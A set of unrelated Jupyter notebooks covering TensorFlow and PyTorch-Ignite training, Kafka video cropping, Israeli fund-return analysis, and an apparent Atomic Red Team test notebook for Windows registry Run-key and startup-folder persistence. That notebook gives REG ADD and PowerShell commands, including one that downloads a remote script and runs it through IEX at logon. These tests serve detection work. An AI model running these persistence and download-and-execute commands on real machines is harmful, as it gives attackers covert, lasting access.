epochs=3, callbacks=callbacks) ``` 워커가 정지당하면, 정지당한 워커가 다시 살아날 때까지 전체 클러스터가 잠시 멈춥니다. 워커가 클러스터에 다시 들어오면, 다른 워커도 재시작됩니다. 모든 워커가 이전에 저장한 체크포인트 파일을 읽고, 예전 상태를 불러오면 클러스터가 다시 일관된 상태가 됩니다. 그리고서 훈련이 재개됩니다. `ModelCheckpoint`의 `filepath`가 위치한 디렉터리를 살펴보면, 임시로 생성된 체크포인트 파일들을 확인할 수 있을 것입니다. 이 파일들은 실패한 작업을 복구하는데 필요한 것들로, 다중 워커 훈련 작업을 성공적으로 마치고 나면 `tf.keras.Model.fit()` 함수가 끝날 때 라이브러리가 알아서 삭제할 것입니다. ## 참조 1. [텐서플로로 분산 훈련하기](https://www.tensorflow.org/guide/distributed_training) 가이드는 사용 가능한 분산 전략들을 개괄하고 있습니다. 2. 공식 [ResNet50](https://github.com/tensorflow/models/blob/master/official/resnet/imagenet_main.py) 모델은 `MirroredStrategy`나 `MultiWorkerMirroredStrategy`로 훈련할 수 있습니다.
github_jupyter
# Chapter 13: Going Deeper -- the Mechanics of PyTorch (Part 3/3) ## Higher-level PyTorch APIs: a short introduction to PyTorch-Ignite ### Setting up the PyTorch model ``` import torch import torch.nn as nn from torch.utils.data import DataLoader from torchvision.datasets import MNIST from torchvision import transforms image_path = './' torch.manual_seed(1) transform = transforms.Compose([ transforms.ToTensor() ]) mnist_train_dataset = MNIST( root=image_path, train=True, transform=transform, download=True ) mnist_val_dataset = MNIST( root=image_path, train=False, transform=transform, download=False ) batch_size = 64 train_loader = DataLoader( mnist_train_dataset, batch_size, shuffle=True ) val_loader = DataLoader( mnist_val_dataset, batch_size, shuffle=False ) def get_model(image_shape=(1, 28, 28), hidden_units=(32, 16)): input_size = image_shape[0] * image_shape[1] * image_shape[2] all_layers = [nn.Flatten()] for hidden_unit in hidden_units: layer = nn.Linear(input_size, hidden_unit) all_layers.append(layer) all_layers.append(nn.ReLU()) input_size = hidden_unit all_layers.append(nn.Linear(hidden_units[-1], 10)) all_layers.append(nn.Softmax(dim=1)) model = nn.Sequential(*all_layers) return model device = "cuda" if torch.cuda.is_available() else "cpu" model = get_model().to(device) loss_fn = nn.CrossEntropyLoss() optimizer = torch.optim.Adam(model.parameters(), lr=0.001) ``` ### Setting up training and validation engines with PyTorch-Ignite ``` from ignite.engine import Events, create_supervised_trainer, create_supervised_evaluator from ignite.metrics import Accuracy, Loss trainer = create_supervised_trainer( model, optimizer, loss_fn, device=device ) val_metrics = { "accuracy": Accuracy(), "loss": Loss(loss_fn) } evaluator = create_supervised_evaluator( model, metrics=val_metrics, device=device ) ``` ### Creating event handlers for logging and validation ``` # How many batches to wait before logging training status log_interval = 100 @trainer.on(Events.ITERATION_COMPLETED(every=log_interval)) def log_training_loss(): e = trainer.state.epoch max_e = trainer.state.max_epochs i = trainer.state.iteration batch_loss = trainer.state.output print(f"Epoch[{e}/{max_e}], Iter[{i}] Loss: {batch_loss:.2f}") @trainer.on(Events.EPOCH_COMPLETED) def log_validation_results(): eval_state = evaluator.run(val_loader) metrics = eval_state.metrics e = trainer.state.epoch max_e = trainer.state.max_epochs acc = metrics['accuracy'] avg_loss = metrics['loss'] print(f"Validation Results - Epoch[{e}/{max_e}] Avg Accuracy: {acc:.2f} Avg Loss: {avg_loss:.2f}") ``` ### Setting up training checkpoints and saving the best model ``` from ignite.handlers import Checkpoint, DiskSaver # We will save in the checkpoint the following: to_save = {"model": model, "optimizer": optimizer, "trainer": trainer} # We will save checkpoints to the local disk output_path = "./output" save_handler = DiskSaver(dirname=output_path, require_empty=False) # Set up the handler: checkpoint_handler = Checkpoint( to_save, save_handler, filename_prefix="training") # Attach the handler to the trainer trainer.add_event_handler(Events.EPOCH_COMPLETED, checkpoint_handler) # Store best model by validation accuracy best_model_handler = Checkpoint( {"model": model}, save_handler, filename_prefix="best", n_saved=1, score_name="accuracy", score_function=Checkpoint.get_default_score_fn("accuracy"), ) evaluator.add_event_handler(Events.COMPLETED, best_model_handler) ``` ### Setting up TensorBoard as an experiment tracking system ``` from ignite.contrib.handlers import TensorboardLogger, global_step_from_engine tb_logger = TensorboardLogger(log_dir=output_path) # Attach handler to plot trainer's loss every 100 iterations tb_logger.attach_output_handler( trainer, event_name=Events.ITERATION_COMPLETED(every=100), tag="training", output_transform=lambda loss: {"batch_loss": loss}, ) # Attach handler for plotting both evaluators' metrics after every epoch completes tb_logger.attach_output_handler( evaluator, event_name=Events.EPOCH_COMPLETED, tag="validation", metric_names="all", global_step_transform=global_step_from_engine(trainer), ) ``` ### Executing the PyTorch-Ignite model training code ``` trainer.run(train_loader, max_epochs=5) ``` --- Readers may ignore the next cell. ``` ! python ../.convert_notebook_to_script.py --input ch13_part3.ipynb --output ch13_part3.py ```
github_jupyter
# T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>. The following run keys are created by default on Windows systems: * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code> The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be used to set startup folder items for persistence: * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> * <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> * <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code> The following Registry keys can control automatic startup of services during boot: * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code> Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code> The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit</code> and <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</code> subkeys can automatically launch programs. Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run when any user logs on. By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. ## Atomic Tests ``` #Import the Module before running the tests. # Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts. Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force ``` ### Atomic Test #1 - Reg Key Run Run Key Persistence Upon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout. **Supported Platforms:** windows #### Attack Commands: Run with `command_prompt` ```command_prompt REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe" ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 1 ``` ### Atomic Test #2 - Reg Key RunOnce RunOnce Key Persistence. Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. **Supported Platforms:** windows #### Attack Commands: Run with `command_prompt` ```command_prompt REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll" ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 2 ``` ### Atomic Test #3 - PowerShell Registry RunOnce RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry. **Supported Platforms:** windows Elevation Required (e.g. root or admin) #### Attack Commands: Run with `powershell` ```powershell $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 3 ``` ### Atomic Test #4 - Suspicious vbs file run from startup Folder vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** windows Elevation Required (e.g. root or admin) #### Attack Commands: Run with `powershell` ```powershell Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 4 ``` ### Atomic Test #5 - Suspicious jse file run from startup Folder jse files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** windows Elevation Required (e.g. root or admin) #### Attack Commands: Run with `powershell` ```powershell Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 5 ``` ### Atomic Test #6 - Suspicious bat file run from startup Folder bat files can be placed in and executed from the startup folder to maintain persistance. Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** windows Elevation Required (e.g. root or admin) #### Attack Commands: Run with `powershell` ```powershell Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 6 ``` ## Detection Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
github_jupyter
# croppedImageSender - docs and install Interactive cropping tool to define region of interest on a video frame and send the video frames to the Streams application. This is the cropping tool... - https://openbits.app/posts/python-interactive-cropping/ You need to install it: ``` pip install interactivecrop ``` ``` # The orignal test code # crop(sample_images, sample_names, optimize=True, continuous_update=True) ``` ## Specify video that will be cropped and analyized. **StaticVideo** should point to the video that is to analyized. ``` StaticVideo = '/Users/siegenth/Data/airportGate.mp4' ``` ## import all the support components ``` from interactivecrop.interactivecrop import main as crop from interactivecrop.samples import sample_images, sample_names """" Send video, frame-by-frame to Kafka interface - Frame is encoded into ascii so no one gets upset with the data. - Frame will be decomposed into chunks of 'CHUNK_SIZE'. When debugging found Kafka would not send message if it went over threshold. - Receiving test notebook VideoRcvKafka - The Steams application VideoRcvKafka recieves the encode image and scores it with Model. """ import kafka import os import sys import json import base64 import ssl import time import datetime import io from PIL import Image import logging import cv2 import matplotlib.pyplot as plt import numpy as np if '../juypter' not in sys.path: sys.path.insert(0, '../juypter') import credential import streams_aid as aid logging.basicConfig(level=os.environ.get("LOGLEVEL", "INFO")) # img_encoded = str(base64.b64encode(response.content).decode("utf-8")) # img_encoded = str(base64.b64encode(img).decode('utf-8')) def bts_to_img(bts): buff = np.fromstring(bts, np.uint8) buff = buff.reshape(1, -1) img = cv2.imdecode(buff, cv2.IMREAD_COLOR) return img def convertToRGB(image): return cv2.cvtColor(image, cv2.COLOR_BGR2RGB) def encode_img(img): """must be easier way""" with io.BytesIO() as output: img.save(output, format="JPEG") contents = output.getvalue() return base64.b64encode(contents).decode('ascii') def decode_img(bin64): """must be easier way""" img = Image.open(io.BytesIO(base64.b64decode(bin64))) return img ``` ## Get and image from video and set region of interest. ### collect one frame from the video ``` def collect_frames(video_url, frame_count=1, frame_modulo=24, debug=False): """collect a set of frames from the video to work out the cropping region. Notes: - pull out the frames based upon the modulo and frame_count - the correct way, find frames that hav signficant difference between each - now """ frames = [] """get the crop region for a video. [] pull up some frames... [x] - send frames to cropper [x] - get cropper regionquick :param kafka_prod: the handle to sent out messages on kafka :param frame_modulo: send every x frames :param send_wait: after sending a frame wait time :param debug: decode image and write out to verify :return: None """ frame_num = 0 cap = cv2.VideoCapture(video_url) while(cap.isOpened()): ret, frame = cap.read() if ret is False: break frame_num += 1 if not(frame_num % frame_modulo): if debug: image_encoded =encode_img(Image.fromarray(frame, 'RGB')) # debugging - render what we will send. img_raw = decode_img(image_encoded) plt.imshow(img_raw) plt.show() # break down frame into chunks frames.append(frame) if frame_count <= len(frames): break if cv2.waitKey(1) & 0xFF == ord('q'): break cap.release() cv2.destroyAllWindows() return frames secs = 30 frames = collect_frames(video_url=StaticVideo,frame_modulo=30*secs, frame_count=1, debug=False) print("Collected {} frames at the {} second mark.".format(len(frames), secs)) ``` ### Use the collected frame to define a crop region. ``` SHAPE = None def grabCropShape(image_name, shape): global SHAPE SHAPE = shape print("set SHAPE ", image_name, shape, flush=True) ``` ### Press the 'Save Crop Size' button to capture the crop region. ``` crop(frames, callback=grabCropShape) ``` ### Verify that the captured region is what you expected - verify what we collected - **RegionOfInterest** is the cropping specification that will be applied to frame sent ``` image_encoded =encode_img(Image.fromarray(frames[0], 'RGB')) img_raw = decode_img(image_encoded) print("Image size : {} crop region : {} ".format(img_raw.size, SHAPE.size)) RegionOfInterest = (SHAPE.size[0], SHAPE.size[1], SHAPE.size[0]+SHAPE.size[2], SHAPE.size[1]+SHAPE.size[3]) print("regionOfInterest:",RegionOfInterest) cropped = img_raw.crop(RegionOfInterest) plt.imshow(cropped) plt.show() ``` ## Send Cropped Region.... ``` def kafka_producer(credentials): """ Open the connection to the kafka producer :param credentials: :return: kafka producer Request is responsilbe for closing producer. """ prod = None while prod is None: try: prod = kafka.KafkaProducer(bootstrap_servers=credentials["kafka_brokers_sasl"], security_protocol="SASL_SSL", sasl_mechanism="PLAIN", sasl_plain_username=credentials["user"], sasl_plain_password=credentials["api_key"], ssl_cafile=ssl.get_default_verify_paths().cafile) except kafka.errors.NoBrokersAvailable: logging.warning("No Brokers Available. Retrying ...") time.sleep(1) prod = None return prod CHUNK_SIZE = 100000 # maximum number of bytes to transmit at a time def video_kafka(video_url, regionOfInterest, kafka_prod, kafka_topic='VideoFrame', frame_modulo=24, send_wait=.25, debug=False): """Send video via Kafka :param video_url: url of video to pull in and send :param kafka_prod: the handle to sent out messages on kafka :param frame_modulo: send every x frames :param send_wait: after sending a frame wait time :param debug: decode image and write out to verify :return: None """ frame_num = 0 cap = cv2.VideoCapture(video_url) while(cap.isOpened()): ret, frame = cap.read() if ret is False: break frame_num += 1 if not(frame_num % frame_modulo): # crop each frame before sending it. orginal_encoded =encode_img(Image.fromarray(frame, 'RGB')) img_raw = decode_img(orginal_encoded) cropped = img_raw.crop(regionOfInterest) image_encoded = encode_img(cropped) if debug: # debugging - render what we will send. img_raw = decode_img(image_encoded) plt.imshow(img_raw) plt.show() # break down frame into chunks chunks = [image_encoded[i * CHUNK_SIZE:(i + 1) * CHUNK_SIZE] for i in range((len(image_encoded) + CHUNK_SIZE - 1) // CHUNK_SIZE)] # send the chunks. for idx, chunk in enumerate(chunks): logging.debug("chunking - {} #chunks :{} idx:{} len(chunk):{}".format(video_url, len(chunks), idx, len(chunk))) chunk_content = {'video': video_url, 'frame': frame_num, 'chunk_idx':idx, 'chunk_total':len(chunks), 'timestamp': datetime.datetime.utcnow().isoformat() + 'Z', 'data': chunk } kafka_prod.send(kafka_topic, value=json.dumps(chunk_content).encode('utf-8')) ## finish the frame frame chunk_complete = {'video': video_url, 'frame': frame_num, 'chunk_idx': len(chunks), 'chunk_total': len(chunks), 'timestamp': datetime.datetime.utcnow().isoformat() + 'Z', 'data': "" } logging.info("Transmit frame #{}".format(chunk_content["frame"])) kafka_prod.send(kafka_topic, value=json.dumps(chunk_complete).encode('utf-8')) time.sleep(send_wait) if cv2.waitKey(1) & 0xFF == ord('q'): break cap.release() cv2.destroyAllWindows() return @aid.catchInterrupt def videoStream(topic="VideoFrame", videoUrl=None, regionOfInterest=None): creds = json.loads(credential.magsEventStream) prod = kafka_producer(creds,) video_kafka(videoUrl, regionOfInterest, prod, kafka_topic=topic, send_wait=1, frame_modulo=24, debug=False) prod.close() TOPIC="VideoFrame" videoStream(topic=TOPIC, videoUrl=StaticVideo, regionOfInterest=RegionOfInterest) ```
github_jupyter
``` %run "../Retropy_framework.ipynb" mdf = pd.read_csv("../Research/GemelNet.csv") mdf["month"] = pd.to_datetime(mdf["month"], format="%Y/%m/%d") mdf["month_return"] = pd.to_numeric(mdf["month_return"].astype(str).str.replace("%", ""), errors="coerce") mdf["net_flow"] = series_as_float(mdf["net_flow"]) mdf["AUM"] = series_as_float(mdf["AUM"]) #mdf = mdf.set_index("month") def getValue(df): df = df.set_index("month") ser = df["month_return"].dropna().copy() if len(ser) == 0: return pd.Series() prevMonth = ser.index[0] + pd.DateOffset(months=-1) ser[prevMonth] = 0 # we want the serie sto start at 1.0 ser = ser.sort_index() ser.index = ser.index + pd.DateOffset(months=1) return (1+ser.dropna()/100).cumprod() #sym = mdf[mdf["ID"] == 1544] #ym["month_return"] #getValue(sym).plot() def getKeren(id, usd=True): df = mdf[mdf["ID"] == id] name = str(id) + " | " + df.iloc[0]["name"] s = getValue(df) if usd: usdils = getForex("USD", "ILS") s = (s/usdils).dropna() if len(s) > 0: s = s / s[0] s.id = id fee_df = series_as_float(df["fee_assets"]).dropna() if fee_df.shape[0] > 0: s.fee = fee_df.iloc[0] else: s.fee = np.nan return wrap(s, name) def getAum(id): df = mdf[mdf["ID"] == id] name = str(id) + " | " + df.iloc[0]["name"] usdils = getForex("USD", "ILS") #aum = pd.to_numeric(df["AUM"].str.replace(",", "").replace("- - -", "")) #aum = pd.to_numeric(df["AUM"], errors="coerce") aum = series_as_float(df["AUM"]) aum.index = df["month"] aum = aum/usdils aum = wrap(aum.dropna(), name + " AUM") return aum def getFlow(id): df = mdf[mdf["ID"] == id] name = str(id) + " | " + df.iloc[0]["name"] usdils = getForex("USD", "ILS") #flow = pd.to_numeric(df["net_flow"].str.replace(",", "").replace("- - -", "")) flow = series_as_float(df["net_flow"]) flow.index = df["month"] flow = flow/usdils flow = wrap(flow.dropna(), name + " flow") return flow def getFlowSum(id): return getFlow(id).cumsum() ``` ### כל קרנות ההשתלמות מגמל.נט ``` allKranotIDs = set(mdf.loc[mdf["type"]=="קרן השתלמות", "ID"].values) allKranot = [] for id in allKranotIDs: keren = getKeren(id, usd=True) allKranot.append(keren) print(keren.name) allKranot = [s for s in allKranot if len(s.s) > 0] allKranotMenayot = [s for s in allKranot if "מניות" in s.name and not "ללא" in s.name and not "עד" in s.name and not "לפחות" in s.name] allKranotKlali = [s for s in allKranot if "כללי" in s.name and not "לפחות" in s.name] allKranotIBI = [s for s in allKranot if "אי.בי.אי" in s.name] allKranotAltshuler = [s for s in allKranot if "אלטשולר" in s.name] ``` ### השוואה של קרן השתלמות מחקה ממדי חול איי-בי-איי למדדי חול ``` s = getKeren(1544) bench = get("URTH") bench = wrap(get("SPY:50|VGK:30|EEM:13|EWJ:7", mode="NTR"), "composite NTR") benchTR = wrap(get("SPY:50|VGK:30|EEM:13|EWJ:7", mode="TR"), "composite TR") vt = get("VT", mode="NTR") show(s / bench, s, bench, vt, trim=True, legend=True) ``` ### השוואה של קרן השתלמות מחקה סנופי איי-בי-איי לסנופי ``` s = getKeren(2265) bench = get("SPXNTR@IC") spy = get("SPY", mode="NTR") x = (s / bench).dropna() show(x, s, bench, spy, trim=True) s = getKeren(9451) bench = get("SPXNTR@IC") spy = get("SPY", mode="NTR") x = (s / bench).dropna() show(x, s, bench, spy, trim=True) intergemel = getKeren(9451) ibi = getKeren(2265) show(ibi / intergemel, ibi, intergemel, 1) ``` ### קרנות של איי.בי.איי ``` lst = [s for s in allKranot if s.index[0].year < 2008 and "אי.בי.אי" in s.name] #lst = [s for s in lst if not " ** " in s.name] # exclude exclusive funds for specific sectors lst = sorted(lst, key=lambda s: s.name.split("|")[1].strip(" *").split(" ")[0]) [(s.fee, s.name) for s in lst] base = get("VT:60|VFITX:40", mode="NTR") base = convertSeries(base, "USD", "ILS") basem = bom(base) lst = [s.dropna() for s in lst] medianSer = getMedianSer(lst) show(lst, base, basem, base/medianSer, 1, ta=True, legend=False) shown = show(lst, basem, ta=True, silent=True); allbases = mix("VT", "VFITX", n=10, mode="NTR") allbases = [convertSeries(b, "USD", "ILS") for b in allbases] allbases = list(map(bom, allbases)) allbases = trimBy(allbases, shown) showRiskReturn(shown + allbases) showRiskReturn(allbases, setlim=False, lines=True, color="green") showRiskReturn([allbases[6]], setlim=False, lines=True, color="red") s = getKeren(1205) ases = [VXUS, SPY, IEF, get("USDILS@CUR"), GLD, VNQ, FDN] bases = [EIS, VXUS, SPY, QQQ, IEF, get(i_gbLcl)] bases = [EIS, VXUS, SPY, IEF] bases = ["VFINX", i_ac, gb, i_gb] bases = [bom(get(b, mode="NTR")) for b in bases] #bases = [boy(b) for b in bases] #s = boy(s) p = lrret(bases, s, sum1=True) show(p / s, 0, 1, log=False) #lrret([FDN, VXUS], VTI, sum1=True) #show(lup1) ``` ### השוואה של כל קרנות ההשתלמות במסלול כללי לתיק 60\40 פשוט ``` s = get("SPY", mode="NTR") # this is a lame implementation, as it doesn't take into account the tax bases of dividend reinvestment def liquidation(s): if "s" in dir(s): s = s.s return (s/s[0]-1)*0.75+1 show(s, liquidation(s), log=True, ta=True) def getMedianSer(lst): df = pd.DataFrame([s.s for s in lst]).T return wrap(df.median(axis=1), "median") def getMeanSer(lst): df = pd.DataFrame([s.s for s in lst]).T return wrap(df.mean(axis=1), "mean") from ipywidgets import interact, interactive, fixed, interact_manual import ipywidgets as widgets as_ILS = False as_liqduid = False usdils = getForex("ILS", "USD", inv=True) usdils.name = "USDILS|USDILS" stocks = wrap(get(f"{lc}:50|{i_ac}:50"), "~vt") allbases1 = mix(stocks, gb, n=10, mode="NTR") allbases1 = list(map(bom, allbases1)) allbases2 = mix(lc, gb, n=10, mode="NTR") allbases2 = list(map(bom, allbases2)) #allbases1 += [usdils] if as_ILS: allbases1 = [convertSeries(b, "USD", "ILS") for b in allbases1] allbases2 = [convertSeries(b, "USD", "ILS") for b in allbases2] if as_liqduid: allbases1 = [liquidation(b) for b in allbases1] allbases1 = allbases2 b = "VFINX:31|VGTSX:6|VFITX:52|MFBFX:11" b = bom(get(b)) ta = convertSeries(get('TA125@IC'), "ILS", "USD", inv=True) sources = [ta, lc, i_ac, gb, cb, usdils] sources = lmap(get, sources) sources = lmap(bom, sources) def f(year): lst = allKranotMenayot lst = allKranotKlali #lst = allKranot #lst = allKranotIBI if as_ILS: lst = [convertSeries(b, "USD", "ILS") for b in lst] if as_liqduid: lst = [liquidation(b) for b in lst] lst = [s for s in lst if s.index[0].year < year] lst = [s for s in lst if not " ** " in s.name] # exclude exclusive funds for specific sectors lst = [s[str(year):] for s in lst] lst = [s for s in lst if s.shape[0] > 0] lst = sorted(lst, key=lambda s: s.name.split("|")[1].strip(" *").split(" ")[0]) #lst += [usdils, b] #print("\n".join([s.name for s in lst])) lst = doTrim(lst) allbases = trimBy(allbases1, lst) lst = trimBy(lst, allbases) if True: fits = [lrret(s, sources, sum1=False, fit_values=True, pos_weights=False, return_ser=True) for s in lst] names = [s.name for s in lst] df = pd.DataFrame(dict(zip(names, fits))) display(df) # shoe risk return if False: plt.figure(figsize=(16, 10)) showRiskReturn(lst, annotations=[s.name[::-1] for s in lst]) showRiskReturn(lst + allbases, annotations=False) showRiskReturn(allbases, setlim=False, lines=True, color="green", annotations=False) if len(allbases) > 6: showRiskReturn([allbases[6]], setlim=False, lines=True, color="red") #showRiskReturn([usdils], setlim=False, lines=False, color="blue") plt.show() # show returns if False: if len(allbases) > 10: show(lst, allbases[0], allbases[10], allbases[6], legend=False, trim=False) # show relative returns if False: lst = [s / s[0] for s in lst] medianSer = getMeanSer(lst) lst = [s / medianSer for s in lst] show(lst, ta=False, legend=False) interact(f, year=widgets.IntSlider(min=2000,max=2018,step=1,value=2008)); s = getKeren(1204, usd=True) usdils = getForex("ILS", "USD", inv=True) ta = convertSeries(get('TA125@IC'), "ILS", "USD", inv=True) sources = [usdils, lc, gb, i_ac, EIS, 'TTA25@IC', em_gbLcl, em_gbUsd] sources = [ta, lc, i_ac, gb, cb, usdils] sources = lmap(get, sources) sources = lmap(bom, sources) b = "VFINX:34|VGTSX:6|VFITX:54|MFBFX:12" lrret(s, sources, sum1=False, fit_values=True, pos_weights=True, return_ser=True) #show(b) s = getKeren(579, usd=True) usdils = getForex("ILS", "USD", inv=True) sources = [usdils, lc, gb, i_ac, EIS, 'TTA25@IC'] sources = ['TA35@IC', lc] ta = get('TA35@IC') ta = convertSeries(ta, "ILS", "USD", inv=True) sources = [ta, lc, i_ac, gb, cb] sources = lmap(get, sources) sources = lmap(bom, sources) show_rolling_beta(s, sources, window=24, rsq=False, pvalue=False) lst = [s for s in allKranot if s.index[0].year < 2010 and "מניות" in s.name and not "ללא" in s.name and not "עד" in s.name] lst = [s for s in lst if not " ** " in s.name] # exclude exclusive funds for specific sectors lst = sorted(lst, key=lambda s: s.name.split("|")[1].strip(" *").split(" ")[0]) [(s.fee, s.name) for s in lst] base = get("VT:60|VFITX:40", mode="NTR") basem = bom(base) lst = [s.dropna() for s in lst] medianSer = getMedianSer(lst) show(lst, base, basem, base/medianSer, 1, ta=True, legend=False) shown = show(lst, basem, ta=True, silent=True); allbases = mix("VT", "VFITX", n=10, mode="NTR") allbases = list(map(bom, allbases)) allbases = trimBy(allbases, shown) showRiskReturn(shown + allbases) showRiskReturn(allbases, setlim=False, lines=True, color="green") showRiskReturn([allbases[6]], setlim=False, lines=True, color="red") ``` ### השוואה של כל קרנות ההשתלמות במסלול כללי לתיק 60\40 פשוט - השוואה יחסית בין הקרנות 